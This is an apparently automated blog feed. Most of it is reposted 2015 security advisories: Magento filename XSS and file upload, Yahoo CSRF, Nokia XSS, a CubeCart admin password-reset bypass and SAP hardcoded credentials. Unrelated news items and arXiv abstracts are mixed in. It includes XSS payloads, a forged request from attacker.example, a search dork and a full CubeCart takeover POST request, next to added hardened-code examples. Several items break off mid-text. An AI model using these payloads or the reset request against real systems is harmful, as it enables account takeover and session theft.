The Vulnerability Laboratory Research Team discovered an application-side file input validation web vulnerability in the official Magento Commerce online service web-application.

Vulnerability Disclosure Timeline:
==================================
2015-08-13: Researcher Notification & Coordination (Hadji Samir - Evolution Security GmbH)
2015-08-14: Vendor Notification (Magento Security Team - Bug Bounty Program)
2015-08-22: Vendor Response/Feedback (Magento Security Team - Bug Bounty Program)
2015-09-05: Vendor Fix/Patch (Magento Developer Team)
2015-09-10: Bug Bounty Reward (Magento Security Team - Bug Bounty Program)
2015-09-11: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
An application-side web vulnerability has been discovered in the official Magento Commerce online service web-application. The vulnerability allows a remote attacker to inject own script code into the application-side of the affected application module.

The web vulnerability is located in the `filename` and `files` values of the `/products/bug-tracking/report/saveIssue/` module. Remote attackers are able to upload files with malicious `files` and `filename` values via the `upload` POST method request to compromise the Magento Commerce web-application. Remote attackers are also able to combine the filename issue with persistently injected script code to execute further malicious requests. The attack vector is located on the application-side of the Magento service and the request method to inject is POST. The issue is remotely exploitable and was reproduced with two test accounts. Both the sender and the receiver of the ticket are affected by the issue.

A second problem is that the upload filename is not securely restricted. Because the name value is stored without validation, files with multiple or malicious extensions can be uploaded, which can be chained to remotely elevate user privileges through malicious interaction (arbitrary file upload - multiple extensions).

The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.9. Exploitation of the application-side validation web vulnerability requires a low privileged web-application user account and only low user interaction (the receiver has to view the issue). Successful exploitation of the security vulnerability results in a compromise of the Magento Commerce web-application.

Request Method(s):
[+] [POST]

Vulnerable Domain(s):
[+] http://ift.tt/gRsn9E

Vulnerable Module(s):
[+] /products/bug-tracking/report/saveIssue/

Vulnerable Parameter(s):
[+] filename
[+] files

Affected Module(s):
[+] /saveIssue/

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers with a low privileged application user account and only low user interaction (click). For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Login to the Magento website
2. Go to http://ift.tt/1QsB1OW
3. Create a new issue report
4. Upload a file whose filename carries the payload script code (code injection) via POST
5. Submit the report; the payload code executes when the issue is displayed
6. Successful reproduction of the remote vulnerability in the filename value!

PoC: Source
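The two defects the advisory describes live in one field: the uploaded filename is stored and rendered into the issue page as-is (persistent script injection) and its extension is never restricted (multiple or malicious extensions). The following is an added example, not Magento's code and not the researcher's PoC, of how a bug tracker could validate a filename on the way in and escape it on the way out. The extension allowlist, the denylist, the function names and the sample filenames are assumptions constructed for the example; the payload style follows the advisory's description.

```python
"""Added example (not Magento's code): validate an uploaded filename before
storing it, and escape it before rendering it into a ticket page."""
import html
import re
import unicodedata
from pathlib import PurePosixPath

# Assumed policy of the hypothetical bug tracker: what may be stored as an attachment ...
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "txt", "log", "csv", "pdf", "zip"}
# ... and what must never appear in any position of the name ("shell.php.png").
DANGEROUS_EXTENSIONS = {"php", "phtml", "php3", "php5", "phar", "html", "htm", "js", "svg", "xhtml"}
_UNSAFE_CHARS = re.compile(r"[^A-Za-z0-9._-]")


class UnsafeFilename(ValueError):
    """Raised when a filename must be rejected rather than repaired."""


def sanitize_filename(raw: str, max_len: int = 120) -> str:
    """Return a storable filename or raise UnsafeFilename.

    - drops directory components (../, absolute paths, backslashes)
    - NFKC-normalizes and strips control/format characters
    - refuses dangerous extensions anywhere in the name and requires the
      last extension to be allowlisted (report.final.txt stays valid)
    - replaces everything outside [A-Za-z0-9._-] so no markup survives
    """
    name = unicodedata.normalize("NFKC", raw).replace("\\", "/")
    name = PurePosixPath(name).name          # "../../x.txt" -> "x.txt"
    name = "".join(ch for ch in name if unicodedata.category(ch)[0] != "C")
    name = name.strip(" .")
    if not name:
        raise UnsafeFilename("empty filename after normalization")

    exts = name.lower().split(".")[1:]
    if not exts:
        raise UnsafeFilename("missing extension")
    if any(ext in DANGEROUS_EXTENSIONS for ext in exts):
        raise UnsafeFilename(f"dangerous extension in {raw!r}")
    if exts[-1] not in ALLOWED_EXTENSIONS:
        raise UnsafeFilename(f"extension {exts[-1]!r} not allowed")

    stem, ext = name.rsplit(".", 1)
    stem = _UNSAFE_CHARS.sub("_", stem)[: max_len - len(ext) - 1] or "upload"
    return f"{stem}.{ext.lower()}"


def render_attachment_vulnerable(filename: str) -> str:
    """Model of the reported defect: the stored filename is rendered verbatim."""
    return f'<a href="/attachments/{filename}">{filename}</a>'


def render_attachment(filename: str) -> str:
    """Hardened rendering: escape for attribute and text even after sanitizing."""
    safe = html.escape(filename, quote=True)
    return f'<a href="/attachments/{safe}">{safe}</a>'


# Constructed sample uploads: payload-as-filename, double extension, traversal, benign.
SAMPLES = [
    '"><img src=x onerror=alert(document.cookie)>.png',
    "shell.php.png",
    "../../../etc/passwd.txt",
    "report.final.txt",
]


def triage(samples=SAMPLES) -> dict:
    """Run each sample through the filter: {input: stored name or 'REJECTED'}."""
    out = {}
    for raw in samples:
        try:
            out[raw] = sanitize_filename(raw)
        except UnsafeFilename:
            out[raw] = "REJECTED"
    return out


if __name__ == "__main__":
    for raw, result in triage().items():
        print(f"{raw!r:55} -> {result}")
    print("vulnerable:", render_attachment_vulnerable(SAMPLES[0]))
    print("hardened:  ", render_attachment(SAMPLES[0]))
```

The input filter and the output escaping are independent layers: the filter keeps `shell.php.png` off the disk, and the escaping keeps a name that slipped past an older filter from executing when a ticket is viewed.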

Source: Gmail -> IFTTT-> Blogger

[FD] Shopify Bug Bounty #8 - (FilePath) Persistent Vulnerability

[FD] Yahoo Bug Bounty #32 - Cross Site Request Forgery bulkImport Web Vulnerability

Document Title:
===============
Yahoo Bug Bounty #32 - CSRF bulkImport Web Vulnerability

References (Source):
====================
http://ift.tt/1KLqj5B

Release Date:
=============
2015-09-03

Vulnerability Laboratory ID (VL-ID):
====================================
1552

Common Vulnerability Scoring System:
====================================
3.8

Product & Service Introduction:
===============================
Yahoo! Inc. is an American multinational internet corporation headquartered in Sunnyvale, California. It is widely known for its web portal, search engine Yahoo! Search, and related services, including Yahoo! Directory, Yahoo! Mail, Yahoo! News, Yahoo! Finance, Yahoo! Groups, Yahoo! Answers, advertising, online mapping, video sharing, fantasy sports and its social media website. It is one of the most popular sites in the United States. According to news sources, roughly 700 million people visit Yahoo! websites every month. Yahoo! itself claims it attracts `more than half a billion consumers every month in more than 30 languages`.

(Copy of the Vendor Homepage: http://www.yahoo.com )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a cross site request forgery web vulnerability in the official Yahoo Gemini online service web-application.

Vulnerability Disclosure Timeline:
==================================
2015-07-05: Researcher Notification & Coordination (Hadji Samir)
2015-07-06: Vendor Notification (Security Team)
2015-09-03: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Yahoo!
Product: Gemini Yahoo - Online Service (Web-Application) 2015 Q3

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A client-side cross site request forgery web vulnerability has been discovered in the official Yahoo online service web-application. The vulnerability allows a remote attacker to make a logged-in victim's browser issue state-changing requests to the application without the victim's knowledge.

The vulnerability is located in the `rest_call_back` value of the vulnerable `/advertiser/ajax/bulkImportCampaigns` module POST method request. The request is not protected against forgery: a remote attacker can prepare a page that submits the bulk import request on behalf of any logged-in advertiser who opens it, uploading an attacker-chosen CSV file and creating campaigns in the victim's account. The request method is POST and the attack vector is located on the client-side of the online service.

The security risk of the cross site request forgery web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8. Exploitation requires no web-application user account on the attacker's side, only a logged-in victim and low user interaction (opening the attacker's page). Successful exploitation results in unauthorized manipulation of the victim's campaign data and of affected or connected service modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /advertiser/ajax/bulkImportCampaigns

Proof of Concept (PoC):
=======================
The client-side vulnerability can be exploited by remote attackers without a web-application user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Create a CSRF PoC page that posts to /advertiser/ajax/bulkImportCampaigns
2. The victim must be logged in to Yahoo Gemini
3. When the victim opens the page, the CSV file is uploaded and new campaigns are created

Vulnerable Value: rest_call_back
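The PoC steps above describe the classic forgery pattern: the victim's browser attaches the session cookie to a POST that an attacker's page triggered, and the endpoint has no way to tell that request from one sent by its own form. The following is an added example, not Yahoo's code, that models the forged bulk-import request against a cookie-only handler and against a hardened one that checks the request's origin and a session-bound synchronizer token. The endpoint shape, the session store, the token scheme, the `gemini.example` origin and the CSV layout are assumptions constructed for the example.

```python
"""Added example (not Yahoo's code): a forged bulk-import POST against a
cookie-only handler and against one with origin and CSRF-token checks."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

SITE_ORIGIN = "https://gemini.example"        # assumed origin of the application
SERVER_SECRET = secrets.token_bytes(32)        # per-deployment key for CSRF tokens
SESSIONS: dict = {}                            # session id -> advertiser id
CAMPAIGNS: dict = {}                           # advertiser id -> list of campaign names


@dataclass
class Request:
    """Only the parts of a multipart POST that the checks below look at."""
    method: str
    cookies: dict
    headers: dict
    form: dict = field(default_factory=dict)
    files: dict = field(default_factory=dict)


def login(advertiser: str) -> str:
    sid = secrets.token_urlsafe(24)
    SESSIONS[sid] = advertiser
    return sid


def csrf_token_for(session_id: str) -> str:
    """Synchronizer token derived from the session id; needs no extra storage."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def parse_campaign_csv(data: bytes) -> list:
    """Constructed CSV layout: a header row, then the campaign name in column 1."""
    rows = data.decode("utf-8", "replace").splitlines()[1:]
    return [row.split(",")[0].strip() for row in rows if row.strip()]


def bulk_import_vulnerable(req: Request) -> int:
    """Authenticates by cookie alone, so any page the victim visits can drive it."""
    advertiser = SESSIONS.get(req.cookies.get("session"))
    if req.method != "POST" or advertiser is None:
        return 401
    CAMPAIGNS.setdefault(advertiser, []).extend(parse_campaign_csv(req.files.get("file", b"")))
    return 200


def bulk_import_hardened(req: Request) -> int:
    """Same import; the request must additionally prove it came from our own page."""
    sid = req.cookies.get("session")
    advertiser = SESSIONS.get(sid)
    if req.method != "POST" or advertiser is None:
        return 401
    # 1. Browsers set Origin (or Referer) on cross-site form posts and the
    #    attacker's page cannot override it: anything but our origin is refused.
    source = req.headers.get("Origin") or req.headers.get("Referer") or ""
    parts = urlsplit(source)
    if f"{parts.scheme}://{parts.netloc}" != SITE_ORIGIN:
        return 403
    # 2. Synchronizer token: the forging page cannot read it (same-origin
    #    policy), so it cannot send a valid one. Compared in constant time.
    if not hmac.compare_digest(req.form.get("csrf_token", ""), csrf_token_for(sid)):
        return 403
    CAMPAIGNS.setdefault(advertiser, []).extend(parse_campaign_csv(req.files.get("file", b"")))
    return 200


# Constructed attacker CSV, standing in for the file the PoC page uploads.
ATTACKER_CSV = b"name,budget\nattacker-campaign-1,100\nattacker-campaign-2,250\n"


def forged_request(victim_session: str) -> Request:
    """What the victim's browser sends after opening the attacker's page: the
    session cookie travels automatically, a valid token and Origin do not."""
    return Request(
        method="POST",
        cookies={"session": victim_session},
        headers={"Origin": "https://attacker.example"},
        form={"rest_call_back": "handleImport"},
        files={"file": ATTACKER_CSV},
    )


def run_scenario() -> dict:
    """Status of the forged request against both handlers, the campaigns that
    landed in the victim's account each time, and a genuine submission's status."""
    CAMPAIGNS.clear()
    sid = login("victim-advertiser")
    vuln = bulk_import_vulnerable(forged_request(sid))
    after_vuln = list(CAMPAIGNS.get("victim-advertiser", []))
    CAMPAIGNS.clear()
    hard = bulk_import_hardened(forged_request(sid))
    after_hard = list(CAMPAIGNS.get("victim-advertiser", []))
    legit = forged_request(sid)                 # same upload, sent by our own page
    legit.headers = {"Origin": SITE_ORIGIN}
    legit.form["csrf_token"] = csrf_token_for(sid)
    return {"vulnerable": (vuln, after_vuln), "hardened": (hard, after_hard),
            "legitimate": bulk_import_hardened(legit)}


if __name__ == "__main__":
    for name, outcome in run_scenario().items():
        print(name, outcome)
```

The origin check alone is not sufficient (some clients omit both headers, and a misconfigured `Referer` policy can blank them), which is why the token check stays in place as the primary control and the origin check only adds a cheap second refusal.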

Source: Gmail -> IFTTT-> Blogger

Hacker Demonstrated Untethered iOS 9 Jailbreak On Video

Good News for Jailbreakers! Within 24 hours of the launch of iOS 9 at Apple's annual event, a well-known iOS hacker has managed an untethered jailbreak of iOS 9. That's quite impressive. Believe it, iOS 9 has been jailbroken! A reputed hacker 'iH8sn0w', who previously developed popular jailbreak tools like Sn0wbreeze and P0sixspwn, published a new YouTube video last night,


from The Hacker News http://ift.tt/1i31O8x
via IFTTT

Anonymous Donor Offers Reward for Info in Mutilated Cat Case

The Auburn Star reported Thursday the $500 reward was posted by an anonymous donor for information leading to the arrest and conviction of ...

from Google Alert - anonymous http://ift.tt/1L66aaL
via IFTTT

Chung criticizes ruling on Asian support for Platini

SEOUL, South Korea (AP) FIFA presidential contender Chung Mong-joon has criticized election monitors who cleared the Asian Football Confederation of improperly supporting Michel Platini.

from FOX Sports Digital http://ift.tt/1UGB3II
via IFTTT

Lockpickers 3D-Printed Master Key for TSA Luggage Locks and BluePrint Leaked Online

Here's good news and bad news for you. The good news is that if you lose the keys to your TSA-compliant "Travel Sentry" luggage locks, you can just 3D print your own TSA master keys. The bad news is that anyone can now 3D print master keys to open your bags. Yes, the security of 300 million TSA-approved Travel Sentry luggage locks has been compromised, and now


from The Hacker News http://ift.tt/1KclehS
via IFTTT

Jackson lends support to Australian team in wage fight

MELBOURNE, Australia (AP) Former WNBA Most Valuable Player Lauren Jackson has provided her support to Australia's women's soccer team in its fight with Football Federation Australia for increased wages.

from FOX Sports Digital http://ift.tt/1O50yiy
via IFTTT

I have a new follower on Twitter


Paolo Privitera
@Pick1 CEO Know Your Customers - Polyhedric Human Network Router & Serendipity Innovator - part of @StartupChile @500Startups @SingularityU @GalvanizeSF
San Francisco Venezia Santiago
http://t.co/VyULtzE1Hv
Following: 24070 - Followers: 33815

September 11, 2015 at 02:28AM via Twitter http://twitter.com/pppaolo

NGC 4372 and the Dark Doodad


The delightful Dark Doodad Nebula drifts through southern skies, a tantalizing target for binoculars in the constellation Musca, The Fly. The dusty cosmic cloud is seen against rich starfields just south of the prominent Coalsack Nebula and the Southern Cross. Stretching for about 3 degrees across this scene the Dark Doodad is punctuated at its southern tip (lower left) by globular star cluster NGC 4372. Of course NGC 4372 roams the halo of our Milky Way Galaxy, a background object some 20,000 light-years away and only by chance along our line-of-sight to the Dark Doodad. The Dark Doodad's well defined silhouette belongs to the Musca molecular cloud, but its better known alliterative moniker was first coined by astro-imager and writer Dennis di Cicco in 1986 while observing Comet Halley from the Australian outback. The Dark Doodad is around 700 light-years distant and over 30 light-years long. via NASA http://ift.tt/1K9sYRz

Thursday, September 10, 2015

I have a new follower on Twitter


Evgenij Renke
#StudentPartner @Microsoft #GER, #developer, #ITA
#Aachen
http://t.co/jdTmbGsu99
Following: 946 - Followers: 438

September 10, 2015 at 10:21PM via Twitter http://twitter.com/evgen1j

Coarse-to-Fine Sequential Monte Carlo for Probabilistic Programs. (arXiv:1509.02962v1 [cs.AI])

Many practical techniques for probabilistic inference require a sequence of distributions that interpolate between a tractable distribution and an intractable distribution of interest. Usually, the sequences used are simple, e.g., based on geometric averages between distributions. When models are expressed as probabilistic programs, the models themselves are highly structured objects that can be used to derive annealing sequences that are more sensitive to domain structure. We propose an algorithm for transforming probabilistic programs to coarse-to-fine programs which have the same marginal distribution as the original programs, but generate the data at increasing levels of detail, from coarse to fine. We apply this algorithm to an Ising model, its depth-from-disparity variation, and a factorial hidden Markov model. We show preliminary evidence that the use of coarse-to-fine models can make existing generic inference algorithms more efficient.



from cs.AI updates on arXiv.org http://ift.tt/1Q4VU1y
via IFTTT

Compatible Value Gradients for Reinforcement Learning of Continuous Deep Policies. (arXiv:1509.03005v1 [cs.LG])

This paper proposes GProp, a deep reinforcement learning algorithm for continuous policies with compatible function approximation. The algorithm is based on two innovations. Firstly, we present a temporal-difference based method for learning the gradient of the value-function. Secondly, we present the deviator-actor-critic (DAC) model, which comprises three neural networks that estimate the value function, its gradient, and determine the actor's policy respectively. We evaluate GProp on two challenging tasks: a contextual bandit problem constructed from nonparametric regression datasets that is designed to probe the ability of reinforcement learning algorithms to accurately estimate gradients; and the octopus arm, a challenging reinforcement learning benchmark. GProp is competitive with fully supervised methods on the bandit task and achieves the best performance to date on the octopus arm.



from cs.AI updates on arXiv.org http://ift.tt/1OgF7dK
via IFTTT

Recurrent Reinforcement Learning: A Hybrid Approach. (arXiv:1509.03044v1 [cs.LG])

Successful applications of reinforcement learning in real-world problems often require dealing with partially observable states. It is in general very challenging to construct and infer hidden states as they often depend on the agent's entire interaction history and may require substantial domain knowledge. In this work, we investigate a deep-learning approach to learning the representation of states in partially observable tasks, with minimal prior knowledge of the domain. In particular, we study reinforcement learning with deep neural networks, including RNN and LSTM, which are equipped with the desired property of being able to capture long-term dependency on history, and thus providing an effective way of learning the representation of hidden states. We further develop a hybrid approach that combines the strength of both supervised learning (for representing hidden states) and reinforcement learning (for optimizing control) with joint training. Extensive experiments based on a KDD Cup 1998 direct mailing campaign problem demonstrate the effectiveness and advantages of the proposed approach, which performs the best across the board.



from cs.AI updates on arXiv.org http://ift.tt/1Q4VUP8
via IFTTT

The World of Combinatorial Fuzzy Problems and the Efficiency of Fuzzy Approximation Algorithms. (arXiv:1509.03057v1 [cs.AI])

We re-examine a practical aspect of combinatorial fuzzy problems of various types, including search, counting, optimization, and decision problems. We are focused only on those fuzzy problems that take series of fuzzy input objects and produce fuzzy values. To solve such problems efficiently, we design fast fuzzy algorithms, which are modeled by polynomial-time deterministic fuzzy Turing machines equipped with read-only auxiliary tapes and write-only output tapes and also modeled by polynomial-size fuzzy circuits composed of fuzzy gates. We also introduce fuzzy proof verification systems to model the fuzzification of nondeterminism. Those models help us identify four complexity classes: Fuzzy-FPA of fuzzy functions, Fuzzy-PA and Fuzzy-NPA of fuzzy decision problems, and Fuzzy-NPAO of fuzzy optimization problems. Based on a relative approximation scheme targeting fuzzy membership degree, we formulate two notions of "reducibility" in order to compare the computational complexity of two fuzzy problems. These reducibility notions make it possible to locate the most difficult fuzzy problems in Fuzzy-NPA and in Fuzzy-NPAO.



from cs.AI updates on arXiv.org http://ift.tt/1OgF4P3
via IFTTT

Recurrent Neural Network Based Modeling of Gene Regulatory Network Using Bat Algorithm. (arXiv:1509.03221v1 [cs.AI])

Correct inference of genetic regulations inside a cell is one of the greatest challenges in the post-genomic era for biologists and researchers. Several intelligent techniques and models have already been proposed to identify the regulatory relations among genes from biological databases like time series microarray data. The Recurrent Neural Network (RNN) is one of the most popular and simple approaches to model the dynamics as well as to infer correct dependencies among genes. In this paper, the Bat Algorithm (BA) was applied to optimize the model parameters of the RNN model of a Gene Regulatory Network (GRN). Initially the proposed method is tested against a small artificial network without any noise and the efficiency was observed in terms of the number of iterations, the population size and the BA optimization parameters. The model was also validated in the presence of different levels of random noise for the small artificial network, which proved its ability to infer the correct inferences in the presence of noise, as in real world datasets. In the next phase of this research, the BA based RNN is applied to a real world benchmark time series microarray dataset of E. coli. The results show that it is able to identify the maximum number of true positive regulations, but it also includes some false positive regulations. Therefore, BA is very suitable for identifying biologically plausible GRNs with the help of the RNN model.



from cs.AI updates on arXiv.org http://ift.tt/1OgF7dI
via IFTTT

An Epsilon Hierarchical Fuzzy Twin Support Vector Regression. (arXiv:1509.03247v1 [cs.AI])

The research presents epsilon hierarchical fuzzy twin support vector regression based on epsilon fuzzy twin support vector regression and epsilon twin support vector regression. Epsilon FTSVR is achieved by incorporating trapezoidal fuzzy numbers to epsilon TSVR which takes care of uncertainty existing in forecasting problems. Epsilon FTSVR determines a pair of epsilon insensitive proximal functions by solving two related quadratic programming problems. The structural risk minimization principle is implemented by introducing regularization term in primal problems of epsilon FTSVR. This yields dual stable positive definite problems which improves regression performance. Epsilon FTSVR is then reformulated as epsilon HFTSVR consisting of a set of hierarchical layers each containing epsilon FTSVR. Experimental results on both synthetic and real datasets reveal that epsilon HFTSVR has remarkable generalization performance with minimum training time.



from cs.AI updates on arXiv.org http://ift.tt/1Q4VUyS
via IFTTT

Re: [FD] Schneider Electric CitectSCADA Insecure DLL Loading Code Execution Vulnerability

If I can write a file to "C:\Program Files", I already have administrative access to the machine. http://ift.tt/VBZnNp

Source: Gmail -> IFTTT-> Blogger

[FD] Nokia Solutions and Networks @vantage - Multiple Reflected XSS

Document Title:
==============
Nokia Solutions and Networks @vantage - Multiple Reflected XSS

Release Date:
============
9 Sep 2015

Abstract Advisory Information:
=============================
Ugur Cihan Koc discovered 27 reflected XSS vulnerabilities in Nokia NSN @vantage.

Vulnerability Disclosure Timeline:
=================================
24 July 2015 Bug reported to the vendor.
28 July 2015 Asked about the case.
8 Sep 2015 End of support for this product, reported by the vendor.

Discovery Status:
================
Published

Affected Product(s):
===================
Nokia NSN @vantage

Exploitation Technique:
======================
Local, Authenticated

Severity Level:
==============
Medium

Technical Details & Description:
===============================
Affected Path / Parameter [27]:

/cftraces/filter/fl_copy.jsp
  idFilter
  nameFilter
/cftraces/filter/fl_crea1.jsp
  flName
/cftraces/process/pr_show_process.jsp
  serchStatus
  refreshTime
  serchNode
/cftraces/session/se_crea.jsp
  MaxActivationTime
  NumberOfBytes
  NumberOfTracefiles
  SessionName
  serchSessionkind
/cftraces/session/se_show.jsp
  serchSessionDescription
/cftraces/session/tr_crea_filter.jsp
  serchApplication
  serchApplicationkind
/cftraces/session/tr_create_tagg_para.jsp
  columKeyUnique
  columParameter
  componentName
  criteria1
  criteria2
  criteria3
  description
  filter
  id
  pathName
  tableName
  component
/home/certificate_association.jsp
  userid

Proof of Concept (PoC):
======================
http://ift.tt/1O4vwre

Solution Fix & Patch:
====================
There is no fix for the issue. [End of Support]

Security Risk:
=============
The risk of the vulnerability above is estimated as medium.

Credits & Authors:
=================
Ugur Cihan Koc (@_uceka_)
Blog: www.uceka.com

Source: Gmail -> IFTTT-> Blogger

[FD] Defense in depth -- the Microsoft way (part 34): our developers and our QA still ignore our own security recommendations

[FD] DataTables Security Advisory - XSS Vulnerability - CVE-2015-6584

Information

Source: Gmail -> IFTTT-> Blogger

[FD] CubeCart 6.0.6 > 5.2.12 admin hijacking vulnerability

Application: CubeCart 6.0.6 > 5.2.12
Fixed: 07/09/2015 (6.0.7)
Credits: Fernando Câmara @overflowy
Title: Admin account hijacking vulnerability
Dork: inurl:"index.php?_a="
Requirements: Default admin recovery functions enabled... Knowledge of the admin account email

P.O.C

It is possible for an attacker to access the admin password recovery page without a recovery email having been sent first:

admin.php?_g=recovery

The form asks for a Validation Key, an Email and the new password. When a forgot-password validation email is sent, the program saves the randomly generated key in the database in the admin user's row:

Table: CubeCart_admin_users
Field: verify
Type: varchar(32)
Null: YES
Default: NULL

If no forgot-password verification email has been sent, the validation key is the field's configured default, NULL. If we input a space character (%20), the select query built in the function at line 540 of database.class.php returns results as long as the email is correct. The function where() at line 766 of database.class.php calls sqlSafe(), declared at line 162 of mysql.class.php, which quotes our space character, effectively building a query with an empty string like this:

SELECT admin_id,username FROM CubeCart_admin_users WHERE email='admin@email.com' AND verify = ' '; -> an empty string

The database recognizes the empty string as null. A single request is enough to change an admin account password and redirect the attacker straight to the control panel.

POST /admin.php?_g=recovery HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://ift.tt/1O4uewo
Cookie: PHPSESSID=lqc12qi1i5o5sl0jtbqt5747k7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 154

validate=%20&email=admin%40email.com&password%5Bnew%5D=newpass&password%5Bconfirm%5D=newpass&login=Submit&token=62a83c672e2763529b46fd8978ac9451
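The lesson of this report is that a password-reset check must fail closed when no reset key has been issued: a blank submission must never compare equal to an unset key. One caveat for anyone reproducing it: in SQL, `verify = ' '` does not by itself match a NULL column (MySQL's default PAD SPACE collations ignore trailing spaces only when comparing two non-NULL strings), so the match described above requires the unissued key to be stored or read back as an empty string. The following is an added example, not CubeCart's code, that models that symptom in Python on a sqlite3 copy of the advisory's table layout (the `verify_expires` column, the 32-hex-character key format, the sample admin row and the attacker's input are assumptions), and puts a fail-closed version beside it.

```python
"""Added example (not CubeCart's code): the recovery check the advisory
describes, modelled beside a version that fails closed."""
import hmac
import secrets
import sqlite3
from datetime import datetime, timedelta, timezone
from typing import Optional


def make_db() -> sqlite3.Connection:
    """Table layout from the advisory plus an assumed expiry column; constructed admin row."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE CubeCart_admin_users ("
        " admin_id INTEGER PRIMARY KEY, username TEXT, email TEXT,"
        " password TEXT, verify VARCHAR(32) DEFAULT NULL, verify_expires TEXT)"
    )
    db.execute(
        "INSERT INTO CubeCart_admin_users (username, email, password) VALUES (?, ?, ?)",
        ("admin", "admin@email.com", "old-hash"),
    )
    return db


def recover_vulnerable(db, email: str, validate: str, new_password: str) -> bool:
    """Model of the reported flaw: an unissued (NULL) key is treated as '' and
    compared with the trimmed user input, so validate='%20' matches it."""
    row = db.execute(
        "SELECT admin_id, verify FROM CubeCart_admin_users WHERE email = ?", (email,)
    ).fetchone()
    if row is None:
        return False
    admin_id, stored = row
    if (stored or "").strip() == validate.strip():
        db.execute("UPDATE CubeCart_admin_users SET password = ? WHERE admin_id = ?",
                   (new_password, admin_id))
        return True
    return False


def issue_recovery_key(db, email: str, ttl_minutes: int = 30) -> Optional[str]:
    """What the 'forgot password' mail step should store: a random, expiring key."""
    key = secrets.token_hex(16)                 # 32 hex chars, fits varchar(32)
    expires = (datetime.now(timezone.utc) + timedelta(minutes=ttl_minutes)).isoformat()
    cur = db.execute(
        "UPDATE CubeCart_admin_users SET verify = ?, verify_expires = ? WHERE email = ?",
        (key, expires, email),
    )
    return key if cur.rowcount == 1 else None


def recover_hardened(db, email: str, validate: str, new_password: str) -> bool:
    """Fails closed: blank input, no issued key, expired key and mismatch all
    reject; a used key is cleared so the same link cannot be replayed."""
    validate = validate.strip()
    if len(validate) != 32:                     # reject blank or malformed keys up front
        return False
    row = db.execute(
        "SELECT admin_id, verify, verify_expires FROM CubeCart_admin_users"
        " WHERE email = ? AND verify IS NOT NULL", (email,)
    ).fetchone()
    if row is None:
        return False
    admin_id, stored, expires = row
    if datetime.fromisoformat(expires) < datetime.now(timezone.utc):
        return False
    if not hmac.compare_digest(stored, validate):   # constant-time comparison
        return False
    db.execute(
        "UPDATE CubeCart_admin_users SET password = ?, verify = NULL, verify_expires = NULL"
        " WHERE admin_id = ?", (new_password, admin_id))
    return True


def run_scenario() -> dict:
    """Replays the advisory's request (validate=' ') against both handlers, then
    wrong, right and replayed keys against the hardened one."""
    results = {}
    db = make_db()
    results["vulnerable_blank_key"] = recover_vulnerable(db, "admin@email.com", " ", "newpass")

    db = make_db()
    results["hardened_blank_key"] = recover_hardened(db, "admin@email.com", " ", "newpass")
    key = issue_recovery_key(db, "admin@email.com")
    results["hardened_wrong_key"] = recover_hardened(db, "admin@email.com", "0" * 32, "newpass")
    results["hardened_right_key"] = recover_hardened(db, "admin@email.com", key, "newpass")
    results["hardened_replay"] = recover_hardened(db, "admin@email.com", key, "again")
    return results


if __name__ == "__main__":
    for name, changed in run_scenario().items():
        print(f"{name:22} -> {'password changed' if changed else 'rejected'}")
```

Note the `verify IS NOT NULL` predicate in the hardened query: it makes the "no key issued" state unreachable for a match at the database level, independent of how the application layer trims or coerces the submitted value.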

Source: Gmail -> IFTTT-> Blogger

[FD] [ERPSCAN-15-016] SAP NetWeaver – Hardcoded credentials

ERPSCAN Research Advisory [ERPSCAN-15-016] SAP NetWeaver – Hardcoded credentials

Application: SAP NetWeaver
Versions Affected: SAP NetWeaver AS ABAP, probably others
Vendor URL: http://SAP.com
Bugs: Hardcoded credentials
Sent: 06.03.2014
Reported: 07.03.2014
Vendor response: 07.03.2014
Date of Public Advisory: 15.06.2015
Reference: SAP Security Note 2059659
Author: Rustem Gazizov, Diana Grigorieva (ERPScan)

Description

1. ADVISORY INFORMATION
Title: SAP NetWeaver AS ABAP – Hardcoded Credentials
Advisory ID: [ERPSCAN-15-016]
Risk: High
Advisory URL: http://ift.tt/1O4ufQN
Date published: 15.06.2015
Vendors contacted: SAP

2. VULNERABILITY INFORMATION
Class: hardcoded credentials [CWE-798]
Impact: read application data; gain privileges / assume identity
Remotely Exploitable: Yes
Locally Exploitable: No
CVSS Information
CVSS Base Score: 3.6 / 10
CVSS Base Vector:
AV : Access Vector (Related exploit range) Network (N)
AC : Access Complexity (Required attack complexity) High (H)
Au : Authentication (Level of authentication needed to exploit) Single (S)
C : Impact to Confidentiality Partial (P)
I : Impact to Integrity Partial (P)
A : Impact to Availability None (N)

3. VULNERABILITY DESCRIPTION
The program code contains a hardcoded username that changes the system's behavior if the user is authenticated successfully. The user may obtain additional information that should not be displayed.

4. VULNERABLE PACKAGES
SAP NetWeaver AS ABAP
Other versions are probably affected too, but they were not checked.

5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2059659

6. AUTHOR
Rustem Gazizov, Diana Grigorieva (ERPScan)

7. TECHNICAL DESCRIPTION
An attacker can use hardcoded credentials to get unauthorized access and perform various actions in the system. In addition, it is likely that the code will be implemented into the system as a backdoor.

The vulnerability is in the LSCT1I13 ABAP program (lines 61-69):

